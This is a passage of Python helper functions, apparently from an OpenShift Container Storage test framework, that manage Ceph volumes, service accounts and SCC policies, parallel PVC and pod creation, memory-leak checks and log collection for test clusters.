            f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
        )
        # Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
        ct_pod = pod.get_ceph_tools_pod()
        ct_pod.exec_ceph_cmd("ceph progress json", format=None)
        ct_pod.exec_ceph_cmd("ceph rbd task list")
    return False
def delete_volume_in_backend(img_uuid, pool_name=None):
    """
    Delete an Image/Subvolume in the backend

    Args:
        img_uuid (str): Part of VolID which represents corresponding
            image/subvolume in backend, eg:
            ``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
            Output is the CSI generated VolID and looks like:
            ``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
            where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
        pool_name (str): Name of the pool the image/subvolume belongs to

    Returns:
        bool: True if image deleted successfully
            False if:
                Pool not found
                image not found
                image not deleted

    """
    cmd = ""
    valid_error = []
    # Resolve the pool CR to determine which interface (RBD / CephFS) owns it
    pool_cr = get_pool_cr(pool_name)
    if pool_cr is not None:
        if pool_cr["kind"] == "CephFilesystem":
            interface = "CephFileSystem"
        else:
            interface = pool_cr["kind"]
        logger.info(f"pool {pool_cr} kind is {interface}")
    else:
        logger.info(
            f"Pool {pool_name} has no kind of "
            f"{constants.CEPHBLOCKPOOL} "
            f"or {constants.CEPHFILESYSTEM}"
        )
        return False
    # Checking if image is present before trying to delete
    image_present_results = is_volume_present_in_backend(
        interface=interface, image_uuid=img_uuid, pool_name=pool_name
    )
    # Incase image is present delete
    if image_present_results:
        # Build the interface-specific delete command and the error strings
        # that indicate "already gone"
        if interface == constants.CEPHBLOCKPOOL:
            logger.info(
                f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
            )
            valid_error = ["No such file or directory"]
            cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
        if interface == constants.CEPHFILESYSTEM:
            logger.info(
                f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
            )
            valid_error = [
                f"Subvolume 'csi-vol-{img_uuid}' not found",
                f"subvolume 'csi-vol-{img_uuid}' does not exist",
            ]
            cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
        ct_pod = pod.get_ceph_tools_pod()
        try:
            ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
        except CommandFailed as ecf:
            if any([error in str(ecf) for error in valid_error]):
                logger.info(
                    f"Error occurred while verifying volume is present in backend: "
                    f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
                )
                return False
        # Re-check the backend to confirm the image is really gone
        verify_img_delete_result = is_volume_present_in_backend(
            interface=interface, image_uuid=img_uuid, pool_name=pool_name
        )
        if not verify_img_delete_result:
            logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
            return True
        else:
            logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
            return False
    # image was not present in the backend to begin with
    return False
def create_serviceaccount(namespace):
    """
    Create a Serviceaccount

    Args:
        namespace (str): The namespace for the serviceaccount creation

    Returns:
        OCS: An OCS instance for the service_account

    """
    sa_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
    # give the service account a unique name and place it in the namespace
    sa_data["metadata"].update(
        name=create_unique_resource_name("sa", "serviceaccount"),
        namespace=namespace,
    )
    return create_resource(**sa_data)
def get_serviceaccount_obj(sa_name, namespace):
    """
    Get serviceaccount obj

    Args:
        sa_name (str): Service Account name
        namespace (str): The namespace for the serviceaccount creation

    Returns:
        OCS: An OCS instance for the service_account, or None (implicitly)
            when the lookup fails

    """
    sa_ocp = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
    try:
        return OCS(**sa_ocp.get(resource_name=sa_name))
    except CommandFailed:
        # best-effort lookup: log and fall through (returns None)
        logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
    """
    Validate that the service account is listed among the users of the
    given SCC.

    Args:
        sa_name (str): Service Account name
        namespace (str): The namespace for the serviceaccount creation
        scc_name (str): SCC name

    Returns:
        bool: True if sa_name is present in scc of privileged else False

    """
    sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
    logger.info(sa_name)
    ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
    scc_dict = ocp_scc_obj.get(resource_name=scc_name)
    # BUGFIX: 'users' may be absent from the SCC, in which case .get()
    # returns None and iterating it raised TypeError; treat a missing
    # field as "not present"
    scc_users_list = scc_dict.get("users") or []
    return sa_name in scc_users_list
def add_scc_policy(sa_name, namespace):
    """
    Adding ServiceAccount to scc anyuid and privileged

    Args:
        sa_name (str): ServiceAccount name
        namespace (str): The namespace for the scc_policy creation

    """
    # local name chosen so the module-level 'ocp' import is not shadowed
    ocp_obj = OCP()
    user = f"system:serviceaccount:{namespace}:{sa_name}"
    for scc in (constants.ANYUID, constants.PRIVILEGED):
        out = ocp_obj.exec_oc_cmd(
            command=f"adm policy add-scc-to-user {scc} {user}",
            out_yaml_format=False,
        )
        logger.info(out)
def remove_scc_policy(sa_name, namespace):
    """
    Removing ServiceAccount from scc anyuid and privileged

    Args:
        sa_name (str): ServiceAccount name
        namespace (str): The namespace for the scc_policy deletion

    """
    # local name chosen so the module-level 'ocp' import is not shadowed
    ocp_obj = OCP()
    user = f"system:serviceaccount:{namespace}:{sa_name}"
    for scc in (constants.ANYUID, constants.PRIVILEGED):
        out = ocp_obj.exec_oc_cmd(
            command=f"adm policy remove-scc-from-user {scc} {user}",
            out_yaml_format=False,
        )
        logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
    """
    Build the full AWS CLI s3/s3api command line, embedding MCG login
    credentials when an MCG object is supplied.

    Args:
        mcg_obj: An MCG object containing the MCG S3 connection credentials
        cmd: The AWSCLI command to run
        api: True if the call is for s3api, false if s3

    Returns:
        str: The crafted command, ready to be executed on the pod

    """
    api_suffix = "api" if api else ""
    if not mcg_obj:
        # anonymous request — no credentials, no shell wrapping
        return f"aws s3{api_suffix} --no-sign-request {cmd}"
    # credentials are exported inline inside an sh -c "..." wrapper
    credentialed_prefix = (
        f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
        f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
        f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
        f"AWS_DEFAULT_REGION={mcg_obj.region} "
        f"aws s3{api_suffix} "
        f"--endpoint={mcg_obj.s3_internal_endpoint} "
    )
    return f'{credentialed_prefix}{cmd}"'
def get_current_test_name():
    """
    A function to return the current test name in a parsed manner

    Returns:
        str: The test name.

    """
    # pytest exposes "path::name (phase)"; keep only the bare test name
    current = os.environ.get("PYTEST_CURRENT_TEST")
    return current.split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
    """
    Create directories on a pod, nested under the current test's name.

    Args:
        pod_obj: A pod object on which to create directories
        dir_names: A list of directories names to create.

    Returns:
        list: A list of all the full paths of the created directories

    """
    base_dir = get_current_test_name()
    pod_obj.exec_cmd_on_pod(command=f"mkdir -p {base_dir}")
    created_dirs = []
    for dir_name in dir_names:
        full_path = f"{base_dir}/{dir_name}"
        pod_obj.exec_cmd_on_pod(command=f"mkdir -p {full_path}")
        created_dirs.append(full_path)
    return created_dirs
def wait_for_resource_count_change(
    func_to_use,
    previous_num,
    namespace,
    change_type="increase",
    min_difference=1,
    timeout=20,
    interval=2,
    **func_kwargs,
):
    """
    Wait until the total count of PVCs or pods changes by a minimum amount.

    Args:
        func_to_use (function): Function to be used to fetch resource info
            Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
        previous_num (int): Previous number of pods/PVCs for comparison
        namespace (str): Name of the namespace
        change_type (str): Type of change to check. Accepted values are
            'increase' and 'decrease'. Default is 'increase'.
        min_difference (int): Minimum required difference in PVC/pod count
        timeout (int): Maximum wait time in seconds
        interval (int): Time in seconds to wait between consecutive checks

    Returns:
        True if difference in count is greater than or equal to
        'min_difference'. False in case of timeout.

    """
    try:
        sampler = TimeoutSampler(
            timeout, interval, func_to_use, namespace, **func_kwargs
        )
        for sample in sampler:
            # get_all_pods returns a plain list; get_all_pvcs returns a
            # dict with an "items" key
            if func_to_use == pod.get_all_pods:
                current_num = len(sample)
            else:
                current_num = len(sample["items"])
            if change_type == "increase":
                count_diff = current_num - previous_num
            else:
                count_diff = previous_num - current_num
            if count_diff >= min_difference:
                return True
    except TimeoutExpiredError:
        return False
def verify_pv_mounted_on_node(node_pv_dict):
    """
    Check which PVs from the given mapping have a mount point on
    their respective node.

    Args:
        node_pv_dict (dict): Node to PV list mapping
            eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}

    Returns:
        dict: Node to existing PV list mapping
            eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}

    """
    existing_pvs = {}
    for node_name, pv_names in node_pv_dict.items():
        df_on_node = run_cmd(f"oc debug nodes/{node_name} -- df")
        existing_pvs[node_name] = [
            pv_name for pv_name in pv_names if f"/pv/{pv_name}/" in df_on_node
        ]
    return existing_pvs
def converge_lists(list_to_converge):
    """
    Flatten a list of lists into a single list.

    Args:
        list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]

    Returns:
        list (list): return converged list eg: [1,2,3,4]

    """
    flattened = []
    for sublist in list_to_converge:
        flattened.extend(sublist)
    return flattened
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
    """
    Create multiple PVCs in parallel using threads, one batch per
    access mode, then wait for all of them to reach Bound state.

    Args:
        sc_obj (str): Storage Class object
        namespace (str): The namespace for creating pvc
        number_of_pvc (int): NUmber of pvc to be created
        size (str): size of the pvc eg: '10Gi'
        access_modes (list): List of access modes for PVC creation

    Returns:
        pvc_objs_list (list): List of pvc objs created in function

    """
    creation_futures = []
    with ThreadPoolExecutor() as executor:
        for access_mode in access_modes:
            creation_futures.append(
                executor.submit(
                    create_multiple_pvcs,
                    sc_name=sc_obj.name,
                    namespace=namespace,
                    number_of_pvc=number_of_pvc,
                    access_mode=access_mode,
                    size=size,
                )
            )
    # Each future returns a list of PVCs; flatten them into one list
    pvc_objs_list = converge_lists([future.result() for future in creation_futures])
    # Verify every PVC reached Bound state
    status_futures = []
    with ThreadPoolExecutor() as executor:
        for pvc_obj in pvc_objs_list:
            status_futures.append(
                executor.submit(wait_for_resource_state, pvc_obj, "Bound", 90)
            )
    if False in [future.result() for future in status_futures]:
        raise TimeoutExpiredError
    return pvc_objs_list
def create_pods_parallel(
    pvc_list,
    namespace,
    interface,
    pod_dict_path=None,
    sa_name=None,
    raw_block_pv=False,
    dc_deployment=False,
    node_selector=None,
):
    """
    Create pods in parallel, one per PVC, and wait for all of them
    to reach Running state.

    Args:
        pvc_list (list): List of pvcs to be attached in pods
        namespace (str): The namespace for creating pod
        interface (str): The interface backed the PVC
        pod_dict_path (str): pod_dict_path for yaml
        sa_name (str): sa_name for providing permission
        raw_block_pv (bool): Either RAW block or not
        dc_deployment (bool): Either DC deployment or not
        node_selector (dict): dict of key-value pair to be used for nodeSelector field
            eg: {'nodetype': 'app-pod'}

    Returns:
        pod_objs (list): Returns list of pods created

    Raises:
        TimeoutExpiredError: If a pod does not reach Running state in time

    """
    creation_futures = []
    # Added 300 sec wait time since in scale test once the setup has more
    # PODs time taken for the pod to be up will be based on resource available
    wait_time = 300
    if raw_block_pv and not pod_dict_path:
        pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
    with ThreadPoolExecutor() as executor:
        for pvc_obj in pvc_list:
            creation_futures.append(
                executor.submit(
                    create_pod,
                    interface_type=interface,
                    pvc_name=pvc_obj.name,
                    do_reload=False,
                    namespace=namespace,
                    raw_block_pv=raw_block_pv,
                    pod_dict_path=pod_dict_path,
                    sa_name=sa_name,
                    dc_deployment=dc_deployment,
                    node_selector=node_selector,
                )
            )
    pod_objs = [future.result() for future in creation_futures]
    # Pod creation above does not wait for Running state because of the
    # threads usage, so verify it here.
    # Fix: use a separate futures list for the wait phase. The original
    # code appended the wait futures to the creation futures list and then
    # checked 'False in ...' over both, re-inspecting the creation results.
    wait_futures = []
    with ThreadPoolExecutor() as executor:
        for pod_obj in pod_objs:
            wait_futures.append(
                executor.submit(
                    wait_for_resource_state, pod_obj, "Running", timeout=wait_time
                )
            )
    # If pods not up raise exception/failure
    if False in [future.result() for future in wait_futures]:
        raise TimeoutExpiredError
    return pod_objs
def delete_objs_parallel(obj_list):
    """
    Delete the given objects in parallel, one thread per object.

    Args:
        obj_list(list): List can be obj of pod, pvc, etc

    Returns:
        bool: True if obj deleted else False

    """
    workers = [threading.Thread(target=item.delete) for item in obj_list]
    for worker in workers:
        worker.start()
    # Wait for every deletion thread to finish before returning
    for worker in workers:
        worker.join()
    return True
def memory_leak_analysis(median_dict):
    """
    Check worker nodes for a memory leak after a test case execution.

    The leak is evaluated from the "RES" value of the ceph-osd daemon in the
    captured top output (whitespace-split field index 7). The median value
    collected before the test run is the constant start value and the last
    captured sample is the end value; a growth of more than 20% fails.

    Args:
        median_dict (dict): dict of worker nodes and respective median value
            eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}

    Raises:
        UnexpectedBehaviour: If the top-output file for a worker is missing,
            or if the memory growth on any worker exceeds 20%.

    Usage::

        test_case(.., memory_leak_function):
            .....
            median_dict = helpers.get_memory_leak_median_value()
            .....
            TC execution part, memory_leak_fun will capture data
            ....
            helpers.memory_leak_analysis(median_dict)
            ....

    """
    # dict to store memory leak difference for each worker
    diff = {}
    for worker in node.get_worker_nodes():
        memory_leak_data = []
        if os.path.exists(f"/tmp/{worker}-top-output.txt"):
            with open(f"/tmp/{worker}-top-output.txt", "r") as f:
                data = f.readline()
                # Split on spaces and drop empty fields. Renamed from
                # ``list`` to avoid shadowing the builtin.
                fields = [i for i in data.split(" ") if i]
                memory_leak_data.append(fields[7])
        else:
            logging.info(f"worker {worker} memory leak file not found")
            raise UnexpectedBehaviour
        number_of_lines = len(memory_leak_data) - 1
        # Get the start value form median_dict arg for respective worker
        start_value = median_dict[f"{worker}"]
        end_value = memory_leak_data[number_of_lines]
        logging.info(f"Median value {start_value}")
        logging.info(f"End value {end_value}")
        # Convert the values to kb for calculations ("g"/"m" suffixes as
        # emitted by top mean GiB/MiB respectively)
        if start_value.__contains__("g"):
            start_value = float(1024 ** 2 * float(start_value[:-1]))
        elif start_value.__contains__("m"):
            start_value = float(1024 * float(start_value[:-1]))
        else:
            start_value = float(start_value)
        if end_value.__contains__("g"):
            end_value = float(1024 ** 2 * float(end_value[:-1]))
        elif end_value.__contains__("m"):
            end_value = float(1024 * float(end_value[:-1]))
        else:
            end_value = float(end_value)
        # Calculate the percentage of diff between start and end value
        # Based on value decide TC pass or fail
        diff[worker] = ((end_value - start_value) / start_value) * 100
        logging.info(f"Percentage diff in start and end value {diff[worker]}")
        if diff[worker] <= 20:
            logging.info(f"No memory leak in worker {worker} passing the test")
        else:
            logging.info(f"There is a memory leak in worker {worker}")
            logging.info(f"Memory median value start of the test {start_value}")
            logging.info(f"Memory value end of the test {end_value}")
            raise UnexpectedBehaviour
def get_memory_leak_median_value():
    """
    Wait 180 sec while memory data is collected, then compute the median
    "RES" value of the ceph-osd daemon (whitespace-split field index 7 of
    the top output) per worker node. The result is the starting point for
    memory leak evaluation in ``memory_leak_analysis``.

    Returns:
        median_dict (dict): dict of worker nodes and respective median value

    Raises:
        UnexpectedBehaviour: If the top-output file for a worker is missing

    """
    median_dict = {}
    timeout = 180  # wait for 180 sec to evaluate memory leak median data.
    logger.info(f"waiting for {timeout} sec to evaluate the median value")
    time.sleep(timeout)
    for worker in node.get_worker_nodes():
        memory_leak_data = []
        if os.path.exists(f"/tmp/{worker}-top-output.txt"):
            with open(f"/tmp/{worker}-top-output.txt", "r") as f:
                data = f.readline()
                # Renamed from ``list`` to avoid shadowing the builtin
                fields = [i for i in data.split(" ") if i]
                memory_leak_data.append(fields[7])
        else:
            logging.info(f"worker {worker} memory leak file not found")
            raise UnexpectedBehaviour
        # NOTE(review): the samples are strings (possibly with "g"/"m"
        # suffixes). With the single sample read here median() returns it
        # unchanged, but multiple samples would be compared lexically —
        # confirm intent before collecting more than one line.
        median_dict[f"{worker}"] = statistics.median(memory_leak_data)
    return median_dict
def refresh_oc_login_connection(user=None, password=None):
    """
    Refresh the oc user login; defaults to the kubeadmin user with the
    password stored in the cluster directory.

    Args:
        user (str): Username to login
        password (str): Password to login

    """
    login_user = user or config.RUN["username"]
    login_password = password
    if not login_password:
        password_file = os.path.join(
            config.ENV_DATA["cluster_path"], config.RUN["password_location"]
        )
        with open(password_file) as f:
            login_password = f.read()
    ocp.OCP().login(user=login_user, password=login_password)
def rsync_kubeconf_to_node(node):
    """
    Copy kubeconfig to an OCP node if it is not already present there.

    Args:
        node (str): OCP node to copy kubeconfig if not present

    """
    # Fix: the ``node`` parameter (a str) shadows the ``node`` module used
    # elsewhere in this file, so the original ``node.get_master_nodes()``
    # call raised AttributeError on the string argument. Import the module
    # under an alias so both names are usable.
    from ocs_ci.ocs import node as node_module

    filename = os.path.join(
        config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
    )
    file_path = os.path.dirname(filename)
    master_list = node_module.get_master_nodes()
    ocp_obj = ocp.OCP()
    check_auth = "auth"
    check_conf = "kubeconfig"
    node_path = "/home/core/"
    # Copy only when the auth dir (or the kubeconfig inside it) is missing
    if check_auth not in ocp_obj.exec_oc_debug_cmd(
        node=master_list[0], cmd_list=[f"ls {node_path}"]
    ):
        ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
    elif check_conf not in ocp_obj.exec_oc_debug_cmd(
        node=master_list[0], cmd_list=[f"ls {node_path}auth"]
    ):
        ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
    """
    Replace one of OSD pods with pod that contains all data from original
    OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
    to Ceph Placement Groups.

    Args:
        deployment (str): Name of deployment to use

    Returns:
        list: first item is dummy deployment object, second item is dummy pod
            object

    """
    oc = OCP(
        kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
    )
    # Clone the OSD deployment spec under a new unique name
    osd_data = oc.get(deployment)
    dummy_deployment = create_unique_resource_name("dummy", "osd")
    osd_data["metadata"]["name"] = dummy_deployment
    osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
    # get osd container spec
    original_osd_args = osd_containers[0].get("args")
    # Neutralize the container entrypoint so the pod holds the OSD data
    # without actually running the osd daemon
    osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
    osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
        "/bin/bash",
        "-c",
        "sleep infinity",
    ]
    # delete=False: the temp file must survive until oc.create reads it
    osd_file = tempfile.NamedTemporaryFile(
        mode="w+", prefix=dummy_deployment, delete=False
    )
    with open(osd_file.name, "w") as temp:
        yaml.dump(osd_data, temp)
    oc.create(osd_file.name)
    # downscale the original deployment and start dummy deployment instead
    oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
    oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
    osd_list = pod.get_osd_pods()
    # NOTE: the comprehension variable shadows the ``pod`` module, but only
    # within the comprehension's own scope
    dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
    wait_for_resource_state(
        resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
    )
    # Re-run the original OSD init command; it is expected to hang, so it
    # is bounded by a 7 second timeout and then killed
    ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
    try:
        logger.info("Following command should expire after 7 seconds")
        dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
    except TimeoutExpired:
        logger.info("Killing /rook/tini process")
        try:
            dummy_pod.exec_sh_cmd_on_pod(
                "kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
            )
        except CommandFailed:
            # best-effort cleanup; the process may already be gone
            pass
    return dummy_deployment, dummy_pod
def get_failure_domin():
    """
    Get the failure domain configured for the cephblockpool crush rule.

    Returns:
        str: Failure domain from cephblockpool

    """
    ct_pod = pod.get_ceph_tools_pod()
    crush_rules = ct_pod.exec_ceph_cmd(
        ceph_cmd="ceph osd crush rule dump", format="json"
    )
    assert crush_rules, "Failed to get cmd output"
    for crush_rule in crush_rules:
        if constants.CEPHBLOCKPOOL.lower() not in crush_rule.get("rule_name"):
            continue
        for step in crush_rule.get("steps"):
            if "type" in step:
                return step.get("type")
def wait_for_ct_pod_recovery():
    """
    Wait for the ceph tools pod to recover after a node failure scenario
    in which its node went down.

    Returns:
        bool: True in case the ceph tools pod was recovered, False otherwise

    """
    try:
        _ = get_admin_key()
    except CommandFailed as ex:
        logger.info(str(ex))
        if "connection timed out" not in str(ex):
            return False
        logger.info(
            "Ceph tools box was running on the node that had a failure. "
            "Hence, waiting for a new Ceph tools box pod to spin up"
        )
        wait_for_resource_count_change(
            func_to_use=pod.get_all_pods,
            previous_num=1,
            namespace=config.ENV_DATA["cluster_namespace"],
            timeout=120,
            selector=constants.TOOL_APP_LABEL,
        )
    return True
def label_worker_node(node_list, label_key, label_value):
    """
    Label worker nodes so app pods can be scheduled on specific workers.

    Args:
        node_list (list): List of node name
        label_key (str): Label_key to be added in worker
        label_value (str): Label_value

    """
    cmd_out = OCP().exec_oc_cmd(
        command=f"label node {' '.join(node_list)} {label_key}={label_value}",
        out_yaml_format=False,
    )
    logger.info(cmd_out)
def remove_label_from_worker_node(node_list, label_key):
    """
    Remove a label from the given worker nodes.

    Args:
        node_list (list): List of node name
        label_key (str): Label_key to be remove from worker node

    """
    cmd_out = OCP().exec_oc_cmd(
        command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
    )
    logger.info(cmd_out)
def get_pods_nodes_logs():
    """
    Collect logs from all nodes and all pods.

    Returns:
        dict: node/pod name as key, logs content as value (string)

    """
    all_logs = {}
    for node_obj in node.get_node_objs():
        all_logs[node_obj.name] = node.get_node_logs(node_obj.name)
    for pod_obj in pod.get_all_pods():
        try:
            all_logs[pod_obj.name] = pod.get_pod_logs(pod_obj.name)
        except CommandFailed:
            # best-effort: skip pods whose logs cannot be fetched
            pass
    return all_logs
def get_logs_with_errors(errors=None):
    """
    From the logs of all pods and nodes, keep only those containing any of
    the specified errors, writing each matching log to a file as well.

    Args:
        errors (list): List of errors to look for

    Returns:
        dict: node/pod name as key, logs content as value; may be empty

    """
    all_logs = get_pods_nodes_logs()
    errors_list = constants.CRITICAL_ERRORS
    if errors:
        errors_list = errors_list + errors
    output_logs = {}
    for name, log_content in all_logs.items():
        for error_msg in errors_list:
            if error_msg not in log_content:
                continue
            logger.debug(f"Found '{error_msg}' in log of {name}")
            output_logs.update({name: log_content})
            log_path = f"{ocsci_log_path()}/{name}.log"
            with open(log_path, "w") as fh:
                fh.write(log_content)
    return output_logs
def modify_osd_replica_count(resource_name, replica_count):
    """
    Scale an OSD deployment to the given replica count (0 or 1).

    Args:
        resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
        replica_count (int): osd replica count to be changed to

    Returns:
        bool: True in case if changes are applied. False otherwise

    """
    ocp_obj = ocp.OCP(
        kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    # The deployment name is the first four dash-separated parts of the
    # osd pod name, e.g. 'rook-ceph-osd-0'
    deployment_name = "-".join(resource_name.split("-")[0:4])
    params = f'{{"spec": {{"replicas": {replica_count}}}}}'
    return ocp_obj.patch(resource_name=deployment_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
    """
    Scale a deployment up or down to the given replica count.

    Args:
        deployment_name (str): Name of deployment
        replica_count (int): replica count to be changed to

    Returns:
        bool: True in case if changes are applied. False otherwise

    """
    ocp_obj = ocp.OCP(
        kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    return ocp_obj.patch(
        resource_name=deployment_name,
        params=f'{{"spec": {{"replicas": {replica_count}}}}}',
    )
def collect_performance_stats(dir_name):
    """
    Collect performance stats and saves them in file in json format.

    Performance stats include:
        IOPs and throughput percentage of cluster
        CPU, memory consumption of each nodes

    Args:
        dir_name (str): directory name to store stats.

    """
    # local import — presumably avoids a circular import with the cluster
    # module; confirm before moving to module level
    from ocs_ci.ocs.cluster import CephCluster

    log_dir_path = os.path.join(
        os.path.expanduser(config.RUN["log_dir"]),
        f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
        f"{dir_name}_performance_stats",
    )
    if not os.path.exists(log_dir_path):
        logger.info(f"Creating directory {log_dir_path}")
        os.makedirs(log_dir_path)
    performance_stats = {}
    external = config.DEPLOYMENT["external_mode"]
    if external:
        # Skip collecting performance_stats for external mode RHCS cluster
        logging.info("Skipping status collection for external mode")
    else:
        ceph_obj = CephCluster()
        # Get iops and throughput percentage of cluster
        iops_percentage = ceph_obj.get_iops_percentage()
        throughput_percentage = ceph_obj.get_throughput_percentage()
        performance_stats["iops_percentage"] = iops_percentage
        performance_stats["throughput_percentage"] = throughput_percentage
    # ToDo: Get iops and throughput percentage of each nodes
    # Get the cpu and memory of each nodes from adm top
    master_node_utilization_from_adm_top = (
        node.get_node_resource_utilization_from_adm_top(node_type="master")
    )
    worker_node_utilization_from_adm_top = (
        node.get_node_resource_utilization_from_adm_top(node_type="worker")
    )
    # Get the cpu and memory from describe of nodes
    master_node_utilization_from_oc_describe = (
        node.get_node_resource_utilization_from_oc_describe(node_type="master")
    )
    worker_node_utilization_from_oc_describe = (
        node.get_node_resource_utilization_from_oc_describe(node_type="worker")
    )
    performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
    performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
    performance_stats[
        "master_node_utilization_from_oc_describe"
    ] = master_node_utilization_from_oc_describe
    performance_stats[
        "worker_node_utilization_from_oc_describe"
    ] = worker_node_utilization_from_oc_describe
    # Dump everything collected to <log_dir_path>/performance as JSON
    file_name = os.path.join(log_dir_path, "performance")
    with open(file_name, "w") as outfile:
        json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
    pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
    """
    Check the previous container log of a pod for an oomkill message.

    Args:
        pod_name (str): Name of the pod
        namespace (str): Namespace of the pod
        container (str): Name of the container

    Returns:
        bool : True if oomkill messages are not found on log.
            False Otherwise.

    Raises:
        Assertion if failed to fetch logs

    """
    try:
        previous_log = pod.get_pod_logs(
            pod_name=pod_name, namespace=namespace, container=container, previous=True
        )
        return previous_log.find("signal: killed") == -1
    except CommandFailed as ecf:
        # The only acceptable failure is a pod that has no previous
        # terminated container; anything else means log fetch failed
        assert (
            f'previous terminated container "{container}" in pod "{pod_name}" not found'
            in str(ecf)
        ), "Failed to fetch logs"
    return True
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
    """
    Validate that a pod is in Running state and was not restarted or
    re-spinned (its restart count is unchanged).

    Args:
        pod_name (str): Name of the pod
        pod_restart_count (int): Restart count of pod
        namespace (str): Namespace of the pod

    Returns:
        bool : True if pod is in running state and restart
            count matches the previous one

    """
    ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
    pod_data = ocp_obj.get(resource_name=pod_name)
    status = pod_data.get("status")
    restart_count = status.get("containerStatuses")[0].get("restartCount")
    pod_state = status.get("phase")
    if pod_state == "Running" and restart_count == pod_restart_count:
        logger.info("Pod is running state and restart count matches with previous one")
        return True
    logger.error(
        f"Pod is in {pod_state} state and restart count of pod {restart_count}"
    )
    logger.info(f"{pod_data}")
    return False
def calc_local_file_md5_sum(path):
    """
    Compute the MD5 checksum of a local file.

    Arguments:
        path(str): The path to the file

    Returns:
        str: The MD5 checksum

    """
    hasher = hashlib.md5()
    with open(path, "rb") as file_to_hash:
        hasher.update(file_to_hash.read())
    return hasher.hexdigest()
def retrieve_default_ingress_crt():
    """
    Copy the default ingress certificate from the router-ca secret to the
    local code runner for usage with boto3.
    """
    router_ca_secret = OCP(
        kind="secret",
        namespace="openshift-ingress-operator",
        resource_name="router-ca",
    )
    crt_b64 = router_ca_secret.get().get("data").get("tls.crt")
    decoded_crt = base64.b64decode(crt_b64).decode("utf-8")
    with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
        crtfile.write(decoded_crt)
def storagecluster_independent_check():
    """
    Tell whether the storagecluster is running in independent mode, based
    on the value of spec.externalStorage.enable.

    Returns:
        bool: True if storagecluster is running on external mode False otherwise

    """
    sc_data = OCP(
        kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"]
    ).get()
    storage_cluster = sc_data.get("items")[0]
    external_storage = storage_cluster.get("spec", {}).get("externalStorage", {})
    return bool(external_storage.get("enable", False))
def get_pv_size(storageclass=None):
    """
    List the sizes of the PVs belonging to the requested storageclass.

    Args:
        storageclass (str): Name of storageclass

    Returns:
        list: list of pv's size

    """
    pv_items = ocp.OCP(kind=constants.PV).get()["items"]
    return [
        pv_data["spec"]["capacity"]["storage"]
        for pv_data in pv_items
        if pv_data["spec"]["storageClassName"] == storageclass
    ]
def get_pv_names():
    """
    List the names of all PVs in the cluster.

    Returns:
        list: list of pv names

    """
    pv_items = ocp.OCP(kind=constants.PV).get()["items"]
    names = []
    for pv_data in pv_items:
        names.append(pv_data["metadata"]["name"])
    return names
def default_volumesnapshotclass(interface_type):
    """
    Return the default VolumeSnapshotClass for the given interface,
    taking external mode into account.

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)

    Returns:
